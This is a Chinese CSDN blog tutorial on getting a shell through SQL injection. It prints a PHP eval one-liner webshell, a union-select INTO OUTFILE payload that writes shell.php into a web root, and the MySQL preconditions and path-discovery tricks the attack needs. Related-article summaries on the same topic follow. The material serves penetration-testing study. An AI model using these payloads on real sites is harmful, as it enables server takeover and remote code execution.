sql注入与getshell

最新推荐文章于 2024-06-29 08:18:43 发布
最新推荐文章于 2024-06-29 08:18:43 发布
阅读量261 收藏 3
点赞数 4
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72564937/article/details/137944643
版权

一句话木马

php类型的一句话木马: <?php @eval($_POST['123']);?>

一句话木马利用工具:菜刀,蚁剑,冰蝎,哥斯拉

用蚁剑连接一句话木马:

通过注入点写入木马程序的前提条件

1 mysql开启了secure_file_priv=""的配置

2 知道网站代码的真实物理路径

3 物理路径具备写入权限

 通过注入点写入木马程序

在mysql中往磁盘写入文件:

         select "hello word" into outfile "C:\\phpStudy\\WWW\\test.txt";

通过注入点写入webshell:

' union select "<?php @eval($_POST['123']);?>", 2 into outfile "C:\\phpStudy\\WWW\\shell.php"#

获取后台站点真实路径:

1 信息收集,收集站点敏感目录,敏感文件,如phpinfo.php

2 站点网址输入错误的网址路径或加一些非法参数,让其报错,报错信息中可能存在路径信息

3 指纹信息收集:

        nginx默认站点根目录:/usr/share/nginx/html, 配置文件路径:/etc/nginx/nginx.conf

        apache默认站点根目录:/var/www/html

小郑学技术
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试靶机实战-SQL注入getshell
yummy11111的博客
07-18 836
SQL注入getshell靶机实战
sql注入getshell常用大法总结
weixin_54603520的博客
05-20 572
SQL注入是web安全领域最为常见和危险的漏洞之一。成功利用SQL注入漏洞,攻击者可以通过非法构造的SQL语句,干预数据库服务器执行的SQL查询逻辑,获取敏感数据或执行 SQL命令。较高级别的SQL注入,还可以直接在数据库服务器上执行操作系统命令,获取服务器权限,这就是所谓的SQL注入getshellSQL注入getshell需要攻击者对SQL语言和数据库管理系统有较高的理解和熟练掌握。但只要一个网站的SQL语句构建存在缺陷,就可能被有心人利用此漏洞实现命令执行甚至权限获取。
SQL注入-getshell
LJH1999ZN的博客
02-15 1万+
一、getshell的含义 1.什么是shellShell 是一个程序,提供一个用户与操作系统内核连接的环境。这个环境只有一个命令提示符,让用户从键盘输入命令,所以又称为命令行环境。 2.什么是webshell? WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执
sql注入getshell
摘星怪sec的blog
04-17 424
条件:web目录具有写的权限,能够使用单引号;知道网站绝对路径;secure_file_priv为空以sqli-labs举例,secure_file_priv的值默认是NULL(5.5之前默认是空的),则表示限制mysqId不允许导入以及导出在mysql/my.ini中查看是否有secure_file_priv参数,这里是没有的因此我们加上去:secure_flie_priv=''即可这里进行16进制转换,因此是0X开头,写入“
SQL注入GetShell的方法(1)
forinput的博客
05-06 3547
SQL注入getshell的五中方式
sqlserver命令注入和getshell
buffedon的博客
07-03 3752
sqlserver命令注入和getshell1. mssql权限判断当前数据库权限2. mssql 默认数据库3. 数据库常用语句查询当前数据库中所有表的大小4. SA权限开启xp_cmdshell 获取主机权限5. SA权限使用sp_oacreate 执行系统命令6. SA权限使用CLR 执行系统命令6. DB_owner权限 LOG备份Getshell7. DB_owner权限 差异备份Getshell补充CLR导入程序集 1. mssql权限 sa权限:数据库操作,文件管理,命令执行,注册表读取等s
SQL手工注入之getshell
qq_43998932的博客
08-18 2909
第一次写文章,内容有些简单,大佬们轻喷。。 SQL注入简介 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。 SQL注入方式 SQL注入有手工注入和工具注入两种方式,本文为手工注入,手工注入可以更好的理解注入原理,从而在使用工具注入时知道工具做了些什么。 测试环境 可以自行使用虚拟机搭建靶场,安装phpStu
sql注入getshell的几种方式
good good study
04-29 2万+
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
SQL注入getshell
littlecjx
05-29 3441
通过数据库的into outfie可以写入一句话木马进行getshell,由于利用环境相对苛刻,实际环境不常见,现以bWAPP靶场作为验证环境。 选择SQL Injection (GET/Select),安全等级选择low,php版本为5.2.17。 点击go,URL中显示movie参数,于是可直接在URL中构造数据。 注入点判断 构造1 and 1=1,正常显示 构造1 and 1=2,没有数据显示,于是可判断movie处存在整数型注入。 字段数判断(order by) 构造1 order by 8
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册 DB2数据库SQL注入手册是指在使用DB2数据库时,如何检测和防止SQL注入攻击的一份指南。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制...
sql注入的思维导图。
04-19
SQL注入思维导图 SQL注入是一种常见的Web应用程序安全漏洞, attackers可以通过在Web应用程序的输入字段中Inject恶意的SQL代码来访问、修改或控制数据库中的数据。本文将对SQL注入的思维导图进行详细的讲解,并对...
南方数据企业网站管理系统源码包-存有sql注入漏洞与数据库备份getshell漏洞.zip
01-05
南方数据企业网站管理系统-存有sql注入漏洞与数据库备份getshell漏洞,如有侵权,请联系CSDN管理员删除即可
防范SQL注入.pptx
10-27
**使用预编译语句(PreparedStatement):**这是防止SQL注入的首选方法,因为它允许将用户输入的数据与SQL命令分开处理,从而避免了直接将未经验证的字符串拼接到SQL语句中。 ### 三、SQL注入点测试工具 手动测试...
Nosql期末复习
m0_63216005的博客
06-26 754
nosql复习
MyBatis-Plus 查询不到数据,但使用 SQL 可以查询到数据的问题排查
weixin_74268571的博客
06-22 1035
MyBatis-Plus 查询不到数据,但使用 SQL 可以查询到数据的问题详细排查和解决方案
SQL面试题练习 —— 截止目前登陆用户数及登陆用户列表
hu_wei123的博客
06-27 156
题目来源:滴滴。
SQL | 主键(Primary Key)和外键(Foreign Key)有什么区别| 用一个简单例子说明
最新发布
公众号:快乐变态屋 漂亮大男孩的罗德岛
06-29 165
主键的目的是为表中的每一行提供一个唯一的标识符,确保数据表中的每一条记录都可以被精确访问。外键的主要作用是控制不同表中数据之间的关系,防止数据库中出现不一致的数据,例如,防止引用不存在的数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值